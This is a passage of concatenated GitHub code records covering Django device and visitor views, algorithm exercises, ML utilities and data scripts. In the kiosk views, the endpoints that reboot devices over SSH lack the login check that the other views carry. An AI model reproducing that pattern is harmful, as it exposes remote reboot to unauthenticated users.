models.DateTimeField(auto_now_add=True)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='workitem',\n name='type',\n field=models.ManyToManyField(to='works.WorkType'),\n preserve_default=True,\n ),\n ]\n","repo_name":"melnychukk18/portfolio","sub_path":"works/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":2078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"32696644155","text":"from django.shortcuts import render, redirect\nfrom django.contrib.auth.decorators import login_required\nfrom channels.layers import get_channel_layer\nfrom asgiref.sync import async_to_sync\n\nfrom .models import *\n\nfrom .ssh_functions import ssh_send\n\n# devices\n\n@login_required\ndef list_devices(request):\n devices = Device.objects.all()\n return render(request, \"device_and_screen_management/devices/list.html\", {\"devices\": devices})\n\n@login_required\ndef view_device(request, device_id):\n device = Device.objects.get(id=device_id)\n return render(request, \"device_and_screen_management/devices/view.html\", {\"device\": device})\n\ndef restart_all_pages_for_device(request, device_id):\n device = Device.objects.get(id=device_id)\n channel_layer = get_channel_layer()\n for screen in device.screens.all(): async_to_sync(channel_layer.group_send)(f\"infoscreen_{screen.id}\", {\"type\": \"refresh\"})\n return redirect(\"view_device\", device_id=device_id)\n\ndef restart_device_service(request, device_id):\n device = Device.objects.get(id=device_id)\n if device.host_ip and device.ssh_private_key:\n ssh_send(device.host_ip, device.ssh_private_key, \"systemctl restart kiosk.service\")\n return redirect(\"view_device\", device_id=device_id)\n return render(request, \"errors/400.html\", status=400)\n\ndef restart_device(request, device_id):\n device = Device.objects.get(id=device_id)\n if device.host_ip and device.ssh_private_key:\n ssh_send(device.host_ip, device.ssh_private_key, \"reboot\")\n return redirect(\"view_device\", device_id=device_id)\n return render(request, \"errors/400.html\", status=400)\n\n\n# screens\n\n@login_required\ndef list_screens(request):\n screens = Screen.objects.all()\n return render(request, \"device_and_screen_management/screens/list.html\", {\"screens\": screens})\n\n@login_required\ndef view_screen(request, screen_id):\n screen = Screen.objects.get(id=screen_id)\n if request.POST:\n new_order = request.POST[\"new_order\"].split(\",\") # [1, 2, 3]\n for slideshow_id in new_order:\n screen_slideshows = screen.slideshow_schedules.filter(slideshow_id=slideshow_id)\n for screen_slideshow in screen_slideshows:\n screen_slideshow.screen_slideshow_order = new_order.index(slideshow_id) + 1\n screen_slideshow.save()\n return redirect(\"view_screen\", screen_id=screen_id)\n\n return render(request, \"device_and_screen_management/screens/view.html\", {\"screen\": screen})\n","repo_name":"Spillhuset/shinfo","sub_path":"src/apps/device_and_screen_management/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"31041172492","text":"\"\"\"\nLinked List Cycle - Easy #141\n\nGiven a linked list, return a boolean indicating if there is a cycle\n\nExample:\n\nInput: \n1 -> 2 -> 3 -> 4 -> 5 -> 11 -> 6 -> 8 -> 9 -> 7\n ^ |\n | |\n -------------------------------------\n\nOutput:\nTrue\n\"\"\"\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\n\nclass Solution:\n def hasCycle(self, head: ListNode) -> bool:\n # slowPointer and fastPointer both start at the head\n slowPointer = head\n fastPointer = head\n\n # Loop until slowPointer, fasterPointer, or the node after fastPointer becomes null\n # We include fastPointer.next in this check because we'll need to move the pointer by 2 within the loop\n # fastPointer.next.next must be valid, otherwise point shifting will fail\n while slowPointer and fastPointer and fastPointer.next:\n # Move the fastPointer by 2 nodes, while moving the slowPointer by 1\n fastPointer = fastPointer.next.next\n slowPointer = slowPointer.next\n # Eventually, if slowPointer and fastPointer meets, we've found the loop\n if (slowPointer == fastPointer):\n return True\n\n return False\n\n\"\"\"\nTime Complexity : O(n)\nSpace Complexity: O(1)\n\"\"\"\n\ns = Solution()\n\nlist1 = ListNode(1)\nlist2 = ListNode(2)\nlist3 = ListNode(3)\nlist4 = ListNode(4)\nlist5 = ListNode(5)\nlist11 = ListNode(11)\nlist6 = ListNode(6)\nlist8 = ListNode(8)\nlist9 = ListNode(9)\nlist7 = ListNode(7)\n\nlist1.next = list2\nlist2.next = list3\nlist3.next = list4\nlist4.next = list5\nlist5.next = list11\nlist11.next = list6\nlist6.next = list8\nlist8.next = list9\nlist9.next = list7\nlist7.next = list3\n\nanswer = s.hasCycle(list1)\nprint(answer)","repo_name":"tmdenddl/Algorithm","sub_path":"Python/Data Strucutre Related Questions/Linked List/Linked List Cycle - Easy #141.py","file_name":"Linked List Cycle - Easy #141.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38474753460","text":"import os\nos.environ[\"in_bookish\"] = \"true\"\n\n# Custom RQ worker.\nfrom config import DevConfig, ProdConfig\nfrom tasks.util import get_job_entry, init_db_connection, set_config\nimport os\nimport sys\n\nconfig_class = DevConfig\nif len(sys.argv) > 1:\n\tmode = sys.argv[1]\n\tif mode == \"prod\":\n\t\tprint(\"Running in production mode.\")\n\t\tconfig_class = ProdConfig\n\telif mode == \"dev\":\n\t\tprint(\"Running in development mode.\")\n\t\tconfig_class = DevConfig\n\telse:\n\t\texit(\"Invalid argument.\")\nelse:\n\tprint(\"Running in development mode (default).\")\nconfig = vars(config_class)\nset_config(config)\n\ninit_db_connection()\nfor file in os.listdir(config[\"TASK_RESULT_PATH\"]):\n\t# Only look at actual task result files.\n\tif len(file) != 36:\n\t\t\tcontinue\n\tjob_entry = get_job_entry(file)\n\tif job_entry is None:\n\t\tos.remove(config[\"TASK_RESULT_PATH\"] + file)\n","repo_name":"JackNeus/bookish-waddle","sub_path":"clean_results.py","file_name":"clean_results.py","file_ext":"py","file_size_in_byte":828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17232576759","text":"'''\nExplanation of Approach:\n1. We start by initializing the `largest` variable to negative infinity (`float('-inf')`) to make sure that any element in the matrix will be greater than this initial value.\n2. We iterate through each row of the matrix using a nested loop.\n3. Inside the nested loop, we iterate through each element in the current row and compare it with the current largest element. If the current element is greater than the current largest, we update the `largest` variable.\n4. After iterating through all the elements in the matrix, the `largest` variable will hold the largest element.\n\nSample Input:\n3 7 1\n8 5 2\n9 4 6\n\nSample Output:\nThe largest element in the matrix is: 9\n\nTime Complexity: The time complexity of this program is O(m * n), where m is the number of rows and n is the number of columns in the matrix.\n\nSpace Complexity: The space complexity is O(1) as we are using a constant amount of extra space regardless of the input size.\n'''\n\ndef find_largest_element(matrix):\n # Initialize the variable to store the largest element\n largest = float('-inf')\n \n # Iterate through each row in the matrix\n for row in matrix:\n # Iterate through each element in the current row\n for element in row:\n # Compare the current element with the largest element found so far\n if element > largest:\n largest = element\n \n return largest\n\n# Sample input matrix\nsample_matrix = [\n [3, 7, 1],\n [8, 5, 2],\n [9, 4, 6]\n]\n\n# Call the function to find the largest element\nresult = find_largest_element(sample_matrix)\n\n# Print the result\nprint(\"The largest element in the matrix is:\", result)\n\n","repo_name":"avantikachauhann/Algorithm-Alchemy","sub_path":"Python/2D-Arrays/LargestElementIn2DArray.py","file_name":"LargestElementIn2DArray.py","file_ext":"py","file_size_in_byte":1683,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"38816536886","text":"from pathlib import Path\n\nimport hiyapyco\n\n\nclass YamlCallback:\n def __init__(self, target_path):\n self.target_path = Path(target_path)\n\n def render(self, data, sub_dir_origin, sub_dir_target):\n sub_dir_origin = Path(sub_dir_origin)\n if sub_dir_origin.suffix not in [\".yaml\", \".yml\"]:\n return data\n\n target_path = self.target_path.joinpath(sub_dir_target)\n if not target_path.exists():\n return data\n\n target_data = target_path.read_text()\n if len(data) == 0:\n return target_data\n\n if len(target_data) == 0:\n return data\n\n merged_yaml = hiyapyco.load(\n [target_data, data], method=hiyapyco.METHOD_MERGE)\n return str(hiyapyco.dump(merged_yaml))\n","repo_name":"zuplucas/catalog-orange-test","sub_path":"template-engine/run-template/src/framework/templateframework/render/yaml_callback.py","file_name":"yaml_callback.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"7454953842","text":"import os\r\nfrom tensorflow.python import pywrap_tensorflow\r\n'''\r\nimport tensorflow as tf\r\nsaver=tf.train.import_meta_graph('./tmp/train_model.ckpt.meta')\r\ngraph=tf.get_default_graph()\r\na_val=graph.get_tensor_by_name()\r\n'''\r\n'''\r\nimport os\r\nimport re\r\nimport tensorflow as tf\r\nfrom tensorflow.python import pywrap_tensorflow\r\n\r\nmodel_exp = \"20180402-114759\"\r\ndef get_model_filenames(model_dir):\r\n files = os.listdir(model_dir)\r\n meta_files = [s for s in files if s.endswith('.meta')]\r\n if len(meta_files) == 0:\r\n raise ValueError('No meta file found in the model directory (%s)' % model_dir)\r\n elif len(meta_files) > 1:\r\n raise ValueError('There should not be more than one meta file in the model directory (%s)' % model_dir)\r\n meta_file = meta_files[0]\r\n ckpt = tf.train.get_checkpoint_state(model_dir) # 通过checkpoint文件找到模型文件名\r\n if ckpt and ckpt.model_checkpoint_path:\r\n # ckpt.model_checkpoint_path表示模型存储的位置,不需要提供模型的名字,它回去查看checkpoint文件\r\n ckpt_file = os.path.basename(ckpt.model_checkpoint_path)\r\n return meta_file, ckpt_file\r\n\r\n meta_files = [s for s in files if '.ckpt' in s]\r\n max_step = -1\r\n for f in files:\r\n step_str = re.match(r'(^model-[\\w\\- ]+.ckpt-(\\d+))', f)\r\n if step_str is not None and len(step_str.groups()) >= 2:\r\n step = int(step_str.groups()[1])\r\n if step > max_step:\r\n max_step = step\r\n ckpt_file = step_str.groups()[0]\r\n return meta_file, ckpt_file\r\n\r\n\r\nmeta_file, ckpt_file = get_model_filenames(model_exp)\r\n\r\nprint('Metagraph file: %s' % meta_file)\r\nprint('Checkpoint file: %s' % ckpt_file)\r\nreader = pywrap_tensorflow.NewCheckpointReader(os.path.join(model_exp, ckpt_file))\r\nvar_to_shape_map = reader.get_variable_to_shape_map()\r\nfor key in var_to_shape_map:\r\n print(\"tensor_name: \", key)\r\n # print(reader.get_tensor(key))\r\n\r\nwith tf.Session() as sess:\r\n saver = tf.train.import_meta_graph(os.path.join(model_exp, meta_file))\r\n saver.restore(tf.get_default_session(),\r\n os.path.join(model_exp, ckpt_file))\r\n print(tf.get_default_graph().get_tensor_by_name(\"Logits/weights:0\"))\r\n '''\r\n\r\n\r\n\r\n# 使用NewCheckpointReader来读取ckpt里的变量\r\nfrom tensorflow.python import pywrap_tensorflow\r\n\r\ncheckpoint_path = './tmp/train_model.ckpt'\r\nreader = pywrap_tensorflow.NewCheckpointReader(checkpoint_path) # tf.train.NewCheckpointReader\r\nvar_to_shape_map = reader.get_variable_to_shape_map()\r\nvar_to_shape_map=sorted(var_to_shape_map)\r\nfor i ,key in enumerate(var_to_shape_map):\r\n print(\"tensor_name: \", key)\r\n print(reader.get_tensor(key))\r\n\r\n# 使用print_tensors_in_checkpoint_file打印ckpt里的内容\r\n'''\r\nfrom tensorflow.python.tools.inspect_checkpoint import print_tensors_in_checkpoint_file\r\n\r\nprint_tensors_in_checkpoint_file('./tmp/train_model.ckpt.data-00000-of-00001', # ckpt文件名字\r\n None, # 如果为None,则默认为ckpt里的所有变量\r\n True, # bool 是否打印所有的tensor,这里打印出的是tensor的值,一般不推荐这里设置为False\r\n True) # bool 是否打印所有的tensor的name\r\n# 上面的打印ckpt的内部使用的是pywrap_tensorflow.NewCheckpointReader所以,掌握NewCheckpointReader才是王道\r\n'''","repo_name":"Buster-maker/classify","sub_path":"read_ckpt.py","file_name":"read_ckpt.py","file_ext":"py","file_size_in_byte":3434,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13359732651","text":"#Create a program that asks the user to enter their name and their age. \n#Print out a message addressed to them that tells them the year that they \n#will turn 100 years old.\n#Extras:\n#Add on to the previous program by asking the user for another number and \n#printing out that many copies of the previous message. (Hint: order of \n#operations exists in Python)\n#Print out that many copies of the previous message on separate lines. (Hint: the string \"\\n is the same as pressing the ENTER button)\n\nfrom datetime import date\n\nage = int(input(\"What is your age?\"))\nname = input(\"What is your name?\")\nprint_count = int(input(\"Print output count?\"))\n\nyear_to_add = 100-age\n\ncurrent_year = date.today().year\n\noutput_year = current_year + year_to_add\n\nfor index in range(print_count):\n\tprint(\"Hi \"+name +\" you will be 100 in \"+ str(output_year)+\"\\n\")","repo_name":"adambatchelor2/python","sub_path":"PracticePython_1_YearsAdd.py","file_name":"PracticePython_1_YearsAdd.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25692209718","text":"import pygame\n\nfrom vroom.resource_manager import ResourceManager\n\n\nclass AudioManager:\n totalChannels: int = 0\n categories: dict[str, list[pygame.mixer.Channel]] = {}\n\n @staticmethod\n def Init():\n \"\"\"\n The Init function initializes the pygame mixer module.\n It is called by the AudioManager constructor.\n\n :return: A dictionary of all the sounds in the game\n :doc-author: Trelent\n \"\"\"\n pygame.mixer.pre_init(channels=AudioManager.totalChannels)\n pygame.mixer.init()\n\n @staticmethod\n def AddCategory(name: str, numOfChannels: int):\n \"\"\"\n The AddCategory function adds a new category of channels to the AudioManager.\n The name parameter is used as the key for accessing this category in the future.\n The numOfChannels parameter specifies how many channels should be allocated to this category.\n\n :param name: str: Identify the category\n :param numOfChannels: int: Determine how many channels are allocated to the category\n :return: A list of channels\n :doc-author: Trelent\n \"\"\"\n allocatedChannels: int = AudioManager.totalChannels\n AudioManager.totalChannels += numOfChannels\n pygame.mixer.set_num_channels(AudioManager.totalChannels)\n\n channels: list[pygame.mixer.Channel] = []\n for x in range(numOfChannels):\n channels.append(pygame.mixer.Channel(allocatedChannels))\n allocatedChannels += 1\n AudioManager.categories[name] = channels\n\n @staticmethod\n def PlaySound(categoryName: str, soundName: str) -> None:\n \"\"\"\n The PlaySound function takes in a category name and sound name,\n and plays the sound on an available channel. If no channels are available,\n it prints out an error message.\n\n :param categoryName: str: Specify which category of audio channels the sound should be played on\n :param soundName: str: Get the sound from the resourcemanager\n :return: None\n :doc-author: Trelent\n \"\"\"\n sound: pygame.mixer.Sound = ResourceManager.getSound(soundName)\n\n if categoryName not in AudioManager.categories.keys():\n print(f\"ERROR: Category {categoryName} not found\")\n return\n\n playedAudio: bool = False\n\n for channel in AudioManager.categories[categoryName]:\n if not channel.get_busy():\n channel.play(sound)\n playedAudio = True\n break\n\n if not playedAudio:\n print(f\"All channels in category {categoryName} used up\")\n","repo_name":"lwalton101/VroomVroom","sub_path":"vroom/AudioManager.py","file_name":"AudioManager.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"72398641707","text":"from TensorNAS.Core.Block import Block\nfrom enum import Enum, auto\n\n\nclass Block(Block):\n \"\"\"\n Layers that can be used in the extraction of features\n \"\"\"\n\n # TODO the input to the layer must be divisible by 4. Maybe some thought should be put\n # into making this more robust and removing the placeholder input conv2d block.\n\n MAX_SUB_BLOCKS = 0\n\n class SubBlocks(Enum):\n DEPTHWISECONV2D = auto()\n POINTWISECONV2D = auto()\n GROUPEDCONV2D = auto()\n\n def generate_constrained_input_sub_blocks(self, input_shape):\n from TensorNAS.Layers.Conv2D.Conv2D import Layer as Conv2D\n from TensorNAS.Core.Layer import ArgPadding\n from TensorNAS.Layers.Conv2D import Args as conv_args\n\n return [\n Conv2D(\n input_shape=input_shape,\n parent_block=self,\n args={conv_args.FILTERS: 16, conv_args.PADDING: ArgPadding.SAME},\n )\n ]\n\n def generate_sub_block(self, input_shape, layer_type):\n from TensorNAS.Layers.Conv2D.DepthwiseConv2D import Layer as DepthwiseConv2D\n from TensorNAS.Layers.Conv2D.PointwiseConv2D import Layer as PointwiseConv2D\n from TensorNAS.Layers.Conv2D.GroupedPointwiseConv2D import (\n Layer as GroupedPointwise2D,\n )\n\n if layer_type == self.SubBlocks.GROUPEDCONV2D:\n return [GroupedPointwise2D(input_shape=input_shape, parent_block=self)]\n elif layer_type == self.SubBlocks.POINTWISECONV2D:\n return [PointwiseConv2D(input_shape=input_shape, parent_block=self)]\n elif layer_type == self.SubBlocks.DEPTHWISECONV2D:\n return [DepthwiseConv2D(input_shape=input_shape, parent_block=self)]\n\n return []\n\n def generate_constrained_output_sub_blocks(self, input_shape):\n from TensorNAS.Layers.Conv2D.GroupedPointwiseConv2D import (\n Layer as GroupedPointwiseConv2D,\n )\n from TensorNAS.Layers.Shuffle import Layer as Shuffle\n from TensorNAS.Layers.Conv2D.DepthwiseConv2D import Layer as DepthwiseConv2D\n from TensorNAS.Core.Layer import ArgActivations, ArgPadding\n from TensorNAS.Layers.Conv2D import Args as conv_args\n\n residual_channel_depth = input_shape[-1]\n bottleneck_filters = residual_channel_depth // 4\n\n layers = []\n layers.append(\n GroupedPointwiseConv2D(\n input_shape=input_shape,\n parent_block=self,\n args={\n conv_args.FILTERS: bottleneck_filters,\n conv_args.ACTIVATION: ArgActivations.RELU,\n conv_args.PADDING: ArgPadding.SAME,\n },\n )\n )\n layers.append(\n Shuffle(\n input_shape=layers[-1].get_output_shape(),\n parent_block=self,\n )\n )\n layers.append(\n DepthwiseConv2D(\n input_shape=layers[-1].get_output_shape(),\n parent_block=self,\n args={\n conv_args.KERNEL_SIZE: (3, 3),\n conv_args.PADDING: ArgPadding.SAME,\n },\n )\n )\n layers.append(\n GroupedPointwiseConv2D(\n input_shape=layers[-1].get_output_shape(),\n parent_block=self,\n args={\n conv_args.FILTERS: residual_channel_depth,\n conv_args.ACTIVATION: ArgActivations.RELU,\n },\n )\n )\n return layers\n\n def get_keras_layers(self, input_tensor):\n from TensorNAS.Tools.TensorFlow import shortcut\n\n tmp = input_tensor\n for sb in self.input_blocks + self.middle_blocks + self.output_blocks:\n tmp = sb.get_keras_layers(tmp)\n return shortcut(input_tensor, tmp)\n","repo_name":"alxhoff/TensorNAS","sub_path":"Blocks/SubBlocks/ShuffleNetBlock.py","file_name":"ShuffleNetBlock.py","file_ext":"py","file_size_in_byte":3865,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"31957260156","text":"from django.urls import path\nfrom . import views\n\nurlpatterns = [\n path('login/', views.UserLoginView.as_view(), name='login'),\n path('signup/', views.SignupView.as_view(), name='signup'),\n path('profile//faculty/', views.EditFacultyStaffProfileView.as_view(), name='faculty_profile'),\n path('profile//student/', views.EditStudentProfileView.as_view(), name='student_profile'),\n path('logout/', views.LogoutUserView.as_view(), name='logout_user'),\n\n]","repo_name":"morikeli/smart-scheduler","sub_path":"accounts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25560434776","text":"n=int(input())\nfor i in range(1,n+1):\n arr=list(map(int,list(str(i))))\n if sum(arr)+i == n:\n print(i)\n break\n if i==n:\n print(0)\n'''\n#초안\nn=int(input())\nfor i in range(1,n+1):\n a,b,c = i//100,(i%100)//10,(i%100)%10\n tmp_sum = i+a+b+c\n if tmp_sum == n:\n print(i)\n break\n if i==n:\n print(0)\n'''\n","repo_name":"vvspearlvvs/CodingTest","sub_path":"완전탐색/2231.분해합/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":359,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"41327041097","text":"from django.shortcuts import render\nfrom django.shortcuts import HttpResponse\nfrom django.http import HttpRequest\nfrom django.shortcuts import redirect\nfrom django.db.models import Q\nfrom .models import visitor as T_Visitor\nfrom common.views import *\nfrom django.http import JsonResponse\nfrom .forms import *\nimport json\nfrom django.utils import timezone\nfrom django.forms import widgets as Fwidge\nfrom django.core.exceptions import ObjectDoesNotExist\nfrom baseframe.baseframe import *\n# Create your views here.\n\n#控制器入口\nclass entrance(EntranceView_base):\n def set_view(self, request):\n prj_id = self.request.session['PrjID']\n\n self.template_name = 'content/visitor/visitorinfo.html'\n\n\n#返回table数据及查询结果\nclass get_datasource(get_datasource_base):\n def get_queryset(self, reqeust):\n prj_id = self.request.session['PrjID']\n serinput = self.request.GET.get(\"resultdict[FName]\", '')\n visitor_info = T_Visitor.objects.filter(Q(CREATED_PRJ=prj_id), Q(FName__contains=serinput))\n\n return visitor_info\n\n\n#链接增加模板\nclass add(add_base):\n def set_view(self, request):\n self.template_name = 'content/visitor/visitoradd.html'\n self.objForm = VisitorModelForm\n\n#链接编辑模板\nclass edit(edit_base):\n def set_view(self, request):\n self.template_name = 'content/visitor/visitoradd.html'\n self.model = T_Visitor\n self.objForm = VisitorModelForm\n\n\n#处理新增及保存数据\nclass insert(insert_base):\n def set_view(self, request):\n self.model = T_Visitor\n self.objForm = VisitorModelForm\n\n\n#处理访客退卡\nclass quit(disabled_base):\n def set_view(self, request):\n self.type = 1\n self.status = [1, 0]\n self.model = T_Visitor\n\n fid = self.request.POST.get('fid')\n visitor_info = T_Visitor.objects.get(Q(FID=fid))\n visitor_info.FRefundDate = timezone.now()\n visitor_info.save()\n\n#处理禁用/启用\nclass disabled(disabled_base):\n def set_view(self, request):\n self.model = T_Visitor\n self.type = 1\n self.status = [2, 0]\n","repo_name":"wjcyxx/ISMS","sub_path":"visitor/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2131,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"29162761631","text":"#!/usr/bin/env python\n\nimport sys\nsys.path.append('..')\n\nimport os\nos.environ.setdefault('DJANGO_SETTINGS_MODULE', 'tune_viz.settings')\n\nfrom argparse import ArgumentParser\nfrom tune_viz.models import *\nimport music21\n\ndef iter_bigrams(iterable):\n i = iter(iterable)\n prev = None\n current = None\n\n try:\n while True:\n prev = current\n current = i.next()\n yield (prev, current)\n except StopIteration:\n current = None \n\n yield (prev, current)\n\n\ndef update_measure(measure_text, frequencies):\n m, created = Measure.objects.get_or_create(text=measure_text)\n frequencies[m.id] = frequencies.setdefault(m.id, 0) + 1\n\n return m\n \n\ndef main(key, rhythm, unit_note_length, normalize):\n tunes = Tune.objects.all()\n\n # Filter based on the unit note length\n if unit_note_length:\n tunes = tunes.filter(unit_note_length=unit_note_length)\n\n # Filter by key\n if key:\n tunes = tunes.filter(key=key)\n\n # Filter by rhythm\n if rhythm:\n tunes = tunes.filter(rhythm=rhythm)\n\n total_tunes = tunes.count()\n frequencies = {}\n bigrams = {}\n\n for i, tune in enumerate(tunes):\n try:\n print(u'{: >7,d} / {: <7,d} {}'.format(i + 1, total_tunes, tune.title))\n\n measure_list = map(lambda x: x.strip('|:'), tune.notation.split('|'))\n\n for prev, current in iter_bigrams(measure_list):\n measure = None\n prev_measure = None\n bigram_key = [None, None]\n\n if prev and current:\n prev_measure = update_measure(prev, frequencies)\n measure = update_measure(current, frequencies)\n\n bigram_key[0] = prev_measure.id\n bigram_key[1] = measure.id\n\n bigram_key = tuple(bigram_key)\n bigrams[bigram_key] = bigrams.setdefault(bigram_key, 0) + 1\n\n except:\n print('Unexpected error: {}'.format(sys.exc_info()[0]))\n raise\n\n for measure_id, count in frequencies.iteritems():\n m = Measure.objects.get(id=measure_id)\n m.frequency = count\n m.save()\n\n for bigram_key, count in bigrams.iteritems():\n measure = None\n previous = None\n\n if bigram_key[1]:\n measure = Measure.objects.get(id=bigram_key[1])\n if bigram_key[0]:\n previous = Measure.objects.get(id=bigram_key[0])\n\n bigram, created = MeasureBigram.objects.get_or_create(measure=measure, previous=previous)\n bigram.frequency = count\n bigram.save()\n\n\nif __name__ == '__main__':\n parser = ArgumentParser('Calculate bigrams of measures for a subset of Irish tunes')\n parser.add_argument('-k', '--key', default=None, type=str, dest='key')\n parser.add_argument('-r', '--rhythm', default=None, type=str, dest='rhythm')\n parser.add_argument('-l', '--length', default='1/8', type=str, dest='length', help='Unit note length')\n parser.add_argument('--normalize', action='store_true', dest='normalize')\n args = parser.parse_args()\n\n main(args.key, args.rhythm, args.length, args.normalize)\n","repo_name":"darthmall/Irish-Tune-Visualization","sub_path":"py/ngrams.py","file_name":"ngrams.py","file_ext":"py","file_size_in_byte":3158,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"37"} +{"seq_id":"37421634606","text":"import pandas as pd\r\nimport datetime\r\nimport json\r\nimport pytz\r\n\r\n# New Case Data\r\ncases_url = \"https://raw.githubusercontent.com/MoH-Malaysia/covid19-public/main/epidemic/cases_malaysia.csv\"\r\ncol_list = [\"date\", \"cases_new\"]\r\ncases_df = pd.read_csv(cases_url, usecols=col_list)\r\ncases_today = cases_df.tail(n=1)\r\ncase_results = int(cases_today.cases_new)\r\n\r\n# Death Data\r\ndeath_url = \"https://raw.githubusercontent.com/MoH-Malaysia/covid19-public/main/epidemic/deaths_malaysia.csv\"\r\ncol_list = [\"date\", \"deaths_new\"]\r\ndeath_df = pd.read_csv(death_url, usecols=col_list)\r\ndeath_today = death_df.tail(n=1)\r\ndeath_results = int(death_today.deaths_new)\r\n\r\n# Recovery Data\r\nrecovery_url = \"https://raw.githubusercontent.com/MoH-Malaysia/covid19-public/main/epidemic/cases_malaysia.csv\"\r\ncol_list = [\"date\", \"cases_recovered\"]\r\nrecovery_df = pd.read_csv(recovery_url, usecols=col_list)\r\nrecovery_today = recovery_df.tail(n=1)\r\nrecovery = int(recovery_today.cases_recovered)\r\n\r\n# Mount date\r\ndate_dirty = str(death_today.date)[-36:]\r\ndate_current = date_dirty[:-26]\r\n\r\n# Current time of process for server to log. Malaysian time for refrence\r\nKL = pytz.timezone(\"Asia/Kuala_Lumpur\")\r\ncurrent_time = str(datetime.datetime.now(KL))\r\n\r\n# Summary function\r\ndef short_summary():\r\n summary = [\r\n {\r\n \"country\": \"Malaysia\",\r\n \"last updated\": date_current,\r\n \"cases\": case_results,\r\n \"deaths\": death_results,\r\n \"recovery\": recovery,\r\n \"generated\": current_time,\r\n }\r\n ]\r\n \"\"\"save data to json file\"\"\"\r\n with open(\"data.json\", \"w\") as outfile:\r\n json.dump(summary, outfile, indent=4, sort_keys=False)\r\n return summary\r\n\r\n\r\n# Call function\r\nshort_summary()\r\n","repo_name":"yapkhaichuen/Daily-Covid-Report","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1744,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"37"} +{"seq_id":"11695830368","text":"import pandas as pd\n\nfrom collections import defaultdict, Counter\n\nlabel_path = \"/home/senyang/EigenPhi/blockchair_erc-20_tokens_latest.tsv\"\nwith open(label_path, \"r\") as f:\n lines = f.readlines()[1::]\n lines = [line.strip() for line in lines]\n lines = [line.split(\"\\t\") for line in lines]\n address_to_symbol = dict(zip([line[1] for line in lines], [line[4] for line in lines]))\n\n# label_df = pd.read_csv(label_path, sep=\"\\t\")\n\n# address_to_symbol = dict(zip(label_df[\"address\"], label_df[\"symbol\"]))\n\narb_pathes = [\"/home/senyang/EigenPhi/arbitrage/arbitrage_all.csv\", \"/home/senyang/EigenPhi/arbitrage/arbitrage_no_volume.csv\", \"/home/senyang/EigenPhi/raw_mev/arbitrage_add.csv\"]\n\nclass TokenPair:\n def __init__(self, token_pair):\n self.token_pair = token_pair\n self.count = 0\n self.revenue = []\n self.profit = []\n self.cost = []\n \n def add(self, revenue, profit, cost):\n self.count += 1\n self.revenue.append(revenue)\n self.profit.append(profit)\n self.cost.append(cost)\n\nclass Token:\n def __init__(self, token):\n self.token = token\n self.count = 0\n self.revenue = []\n self.profit = []\n self.cost = []\n \n def add(self, revenue, profit, cost):\n self.count += 1\n self.revenue.append(revenue)\n self.profit.append(profit)\n self.cost.append(cost)\n\ntokens = defaultdict(lambda : Token(None))\n\nfor path in arb_pathes:\n df = pd.read_csv(path)\n columns = df.columns\n columns = [column.strip() for column in columns]\n df.columns = columns\n for token_pair, revenue, profit, cost in df[[\"tokens\", \"revenue\", \"profit\", \"cost\"]].values:\n pair = token_pair.split(\" \")\n pair_symbols = []\n \n for token_addr in pair:\n token_addr = token_addr.strip()[2::]\n if token_addr not in address_to_symbol:\n pair_symbols.append(token_addr)\n else:\n pair_symbols.append(address_to_symbol[token_addr])\n\n # pair_name = \"/\".join(pair_symbols)\n for symbol in pair_symbols:\n tokens[symbol].token = symbol\n tokens[symbol].add(revenue, profit, cost)\n\n # for token_symbol in pair_symbols:\n # tokens[token_symbol] += 1\n\ntoken_list = tokens.values()\n\n# most_profit_tokens = sorted(token_list, key=lambda x: sum(x.profit), reverse=True)\n# for pair in most_profit_tokens[:10:]:\n# print(pair.token, pair.count, sum(pair.profit))\n\n# most_profit_average_tokens = sorted(token_list, key=lambda x: sum(x.profit)/len(x.profit), reverse=True)\n# for pair in most_profit_average_tokens[:10:]:\n# print(pair.token, pair.count, sum(pair.profit)/len(pair.profit))\n\n# most_profit_max_tokens = sorted(token_list, key=lambda x: max(x.profit), reverse=True)\n# for pair in most_profit_max_tokens[:10:]:\n# print(pair.token, pair.count, max(pair.profit))\nselect_tokens = set()\n\nprint(\"most count\")\nmost_count_tokens = sorted(token_list, key=lambda x: x.count, reverse=True)\nfor pair in most_count_tokens[:20:]:\n print(pair.token, pair.count)\n select_tokens.add(pair.token)\n\nprint(\"most revenue\")\nmost_revenue_tokens = sorted(token_list, key=lambda x: sum(x.revenue), reverse=True)\nfor pair in most_revenue_tokens[:20:]:\n print(pair.token, pair.count, 